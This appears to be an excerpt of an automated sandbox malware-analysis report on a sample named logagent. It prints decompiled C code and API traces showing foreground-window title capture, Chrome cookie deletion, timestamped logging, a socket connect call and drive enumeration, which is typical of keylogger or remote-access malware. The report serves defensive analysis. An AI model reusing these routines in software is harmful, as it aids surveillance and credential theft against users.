                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				int _t18;
                                  				char* _t26;
                                  				char* _t27;
                                  				char* _t28;
                                  				char* _t29;
                                  
                                  				if( *0x41bcac != 0) {
                                  					GetLocalTime( &_v20);
                                  					_t3 =  &(_v20.wSecond); // 0x4051ef
                                  					_t26 =  &_v84;
                                  					L00414176();
                                  					_t27 =  &_v68;
                                  					L00414170();
                                  					_t28 =  &_v52;
                                  					L00414140();
                                  					_t29 =  &_v36;
                                  					L00414170();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                  					_t18 = printf(_t29);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t18;
                                  			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 8b184078008214c64558b86fa97955d693c666b74ff00cfecb2717c51fbe4e8b
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                  • Opcode Fuzzy Hash: 8b184078008214c64558b86fa97955d693c666b74ff00cfecb2717c51fbe4e8b
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: bfad978402414b96830ffb0230ed567a8252c16ae122ddb7cdec71540450921e
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: bfad978402414b96830ffb0230ed567a8252c16ae122ddb7cdec71540450921e
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
                                  				char _v5;
                                  				void* _v24;
                                  				char _v40;
                                  				int _t26;
                                  				int _t29;
                                  				void* _t37;
                                  				unsigned int _t66;
                                  				signed int _t67;
                                  				int _t70;
                                  				signed short _t73;
                                  				struct HWND__* _t81;
                                  				void* _t83;
                                  
                                  				_t81 = GetForegroundWindow();
                                  				_t26 = GetWindowTextLengthA(_t81);
                                  				_t89 = _t26;
                                  				if(_t26 <= 0) {
                                  					L6:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 0;
                                  				}
                                  				_t28 = _t26 + 1;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                  				E00413A29(_t29, _t29, _t29, __imp__tolower);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
                                  				_t73 = 0;
                                  				if(E00401838( &_v40) <= 0) {
                                  					L5:
                                  					E004017DD( &_v40);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L6;
                                  				}
                                  				_t82 = 0;
                                  				while(1) {
                                  					_t37 = E0040180C( &_v40, 0, _t82);
                                  					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                  					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						break;
                                  					}
                                  					_t73 = _t73 + 1;
                                  					_t82 = _t73 & 0x0000ffff;
                                  					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
                                  						continue;
                                  					}
                                  					goto L5;
                                  				}
                                  				__eflags = _a20;
                                  				if(_a20 != 0) {
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					asm("repne scasb");
                                  					_t66 =  !( &_v24 | 0xffffffff);
                                  					_t83 = _t37 - _t66;
                                  					_t67 = _t66 >> 2;
                                  					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                  					__eflags = _t70;
                                  					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                  				}
                                  				E004017DD( &_v40);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 1;
                                  			}

                                  0x00412f81
                                  0x00412f84
                                  0x00412f8a
                                  0x00412f8c
                                  0x00413063
                                  0x00413066
                                  0x00000000
                                  0x0041306c
                                  0x00412f95
                                  0x00412f9d
                                  0x00412fa6
                                  0x00412fb0
                                  0x00412fb8
                                  0x00412fc7
                                  0x00412fd1
                                  0x00412fdb
                                  0x00412fe2
                                  0x00412ff2
                                  0x00413001
                                  0x0041300b
                                  0x00413016
                                  0x0041301f
                                  0x00413052
                                  0x00413055
                                  0x0041305d
                                  0x00000000
                                  0x0041305d
                                  0x00413021
                                  0x00413023
                                  0x00413029
                                  0x00413032
                                  0x00413040
                                  0x00000000
                                  0x00000000
                                  0x00413042
                                  0x00413046
                                  0x00413050
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00413050
                                  0x00413072
                                  0x00413076
                                  0x0041307b
                                  0x00413088
                                  0x0041308a
                                  0x00413090
                                  0x00413095
                                  0x0041309c
                                  0x0041309c
                                  0x0041309f
                                  0x0041309f
                                  0x004130a4
                                  0x004130ac
                                  0x004130b5
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                    • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                    • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                    • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                    • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                    • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                    • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • Sleep.KERNEL32(000001F4), ref: 0040543A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                  • Sleep.KERNEL32(00000064), ref: 004054D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                  • String ID: [ $ ]
                                  • API String ID: 3011177377-93608704
                                  • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                  • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
